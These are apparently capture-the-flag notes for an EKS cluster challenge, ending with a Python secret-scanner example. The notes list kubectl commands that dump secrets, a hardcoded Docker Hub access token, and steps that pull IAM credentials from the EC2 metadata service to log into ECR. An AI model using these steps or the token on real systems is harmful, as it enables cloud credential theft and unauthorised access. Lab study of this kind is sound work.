Kubernetes


Kubernetes, also known as K8s, is an open-source system for automating deployment, scaling, and management of containerized applications.

It groups the containers that make up an application into logical units for easy management and discovery.


Kubectl

# Find out the subject (user / service account) for the current context of the kubeconfig
# (built into kubectl as `auth whoami`; the krew plugin exposes it as `kubectl whoami`)
kubectl auth whoami

# Check whether an action is allowed, e.g. `kubectl auth can-i list secrets`
kubectl auth can-i <action>

# List all actions that are allowed for the current subject
kubectl auth can-i --list

# Get pods
kubectl get pods

# Get a specific pod as YAML (mounted secrets, service account, host mounts, privileged flags)
kubectl get pod <name> -o yaml

Secrets

# List secrets in the current namespace
kubectl get secrets

# Get a specific secret as YAML (data values are base64-encoded, not encrypted)
kubectl get secret <secret> -o yaml

Crane

Crane is a tool for managing container images.

# Auth to registry
crane auth login index.docker.io -u eksclustergames -p dckr_pat_YtncV-R85mG7m41lr45iYQj8FuCo

# Pull image
crane pull eksclustergames/base_ext_image /tmp/image.tar

Inspect ECR (Amazon Elastic Container Registry) artifacts

# List the IAM roles exposed by the EC2 instance metadata service (link-local address)
curl http://169.254.169.254/latest/meta-data/iam/security-credentials

# Store the security credentials (a JSON document) in a variable
TOKEN=$(curl http://169.254.169.254/latest/meta-data/iam/security-credentials/eks-challenge-cluster-nodegroup-NodeInstanceRole)

# Store AWS_ACCESS_KEY_ID in env from TOKEN
export AWS_ACCESS_KEY_ID=$(echo "$TOKEN" | jq -r '.AccessKeyId')

# Store AWS_SECRET_ACCESS_KEY in env from TOKEN
export AWS_SECRET_ACCESS_KEY=$(echo "$TOKEN" | jq -r '.SecretAccessKey')

# Store AWS_SESSION_TOKEN in env from TOKEN
export AWS_SESSION_TOKEN=$(echo "$TOKEN" | jq -r '.SessionToken')

# Get the ECR login password using the env variables (region taken from the registry hostname)
aws ecr get-login-password --region us-west-1

# Store pass in variable
PASSWORD=$(aws ecr get-login-password --region us-west-1)

# Use crane to login
crane auth login 688625246681.dkr.ecr.us-west-1.amazonaws.com -u AWS -p "$PASSWORD"

# Get the image config and pipe it to jq (env vars, entrypoint and build history live here)
crane config 688625246681.dkr.ecr.us-west-1.amazonaws.com/central_repo-aaf4a7c@sha256:7486d05d33ecc1c6a1c796d59f63a336cfa8f54a3cbc5abf162f533508dd8b01 | jq
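As an added example (not part of these notes), a small Python check for what `crane config <image> | jq` returns: it scans the image config's `Env` entries and build `history` for credential-looking values, which is the usual reason for inspecting a pulled image. The sample config, its keys and its token values are constructed for the example.

```python
import json
import re

# Constructed sample of an OCI image config as printed by `crane config <image>`,
# trimmed to the fields this check reads. All values here are made up.
SAMPLE_CONFIG = r'''
{
  "architecture": "amd64",
  "config": {
    "Env": [
      "PATH=/usr/local/sbin:/usr/local/bin:/usr/bin",
      "DB_PASSWORD=hunter2-example",
      "APP_MODE=production"
    ],
    "Cmd": ["/app/start.sh"]
  },
  "history": [
    {"created_by": "/bin/sh -c #(nop) ADD file:abc in /"},
    {"created_by": "/bin/sh -c echo AKIAEXAMPLEEXAMPLE00 > /root/.aws/credentials"},
    {"created_by": "/bin/sh -c apt-get update", "empty_layer": true}
  ]
}
'''

# Variable names that usually carry credentials, and the shapes of a few well-known token formats.
SENSITIVE_KEY = re.compile(r"(PASS|PASSWORD|SECRET|TOKEN|API_KEY|ACCESS_KEY)", re.I)
TOKEN_VALUE = re.compile(r"\b(AKIA[0-9A-Z]{16}|dckr_pat_[A-Za-z0-9_-]+|ghp_[A-Za-z0-9]{36})\b")


def find_secret_candidates(config_json: str) -> list[tuple[str, str]]:
    """Return (location, evidence) pairs for env vars and build steps that look like
    they embed credentials. Only the key name is reported for env vars, and token
    matches are truncated, so the report itself does not leak the secret."""
    cfg = json.loads(config_json)
    hits = []
    for entry in cfg.get("config", {}).get("Env", []):
        key, _, value = entry.partition("=")
        if SENSITIVE_KEY.search(key) or TOKEN_VALUE.search(value):
            hits.append(("config.Env", key))
    for i, step in enumerate(cfg.get("history", [])):
        match = TOKEN_VALUE.search(step.get("created_by", ""))
        if match:
            hits.append((f"history[{i}].created_by", match.group(1)[:8] + "..."))
    return hits


if __name__ == "__main__":
    for location, evidence in find_secret_candidates(SAMPLE_CONFIG):
        print(f"{location}: {evidence}")
```

Pipe real output in with `crane config <image> | python3 check.py` after replacing `SAMPLE_CONFIG` with `sys.stdin.read()`.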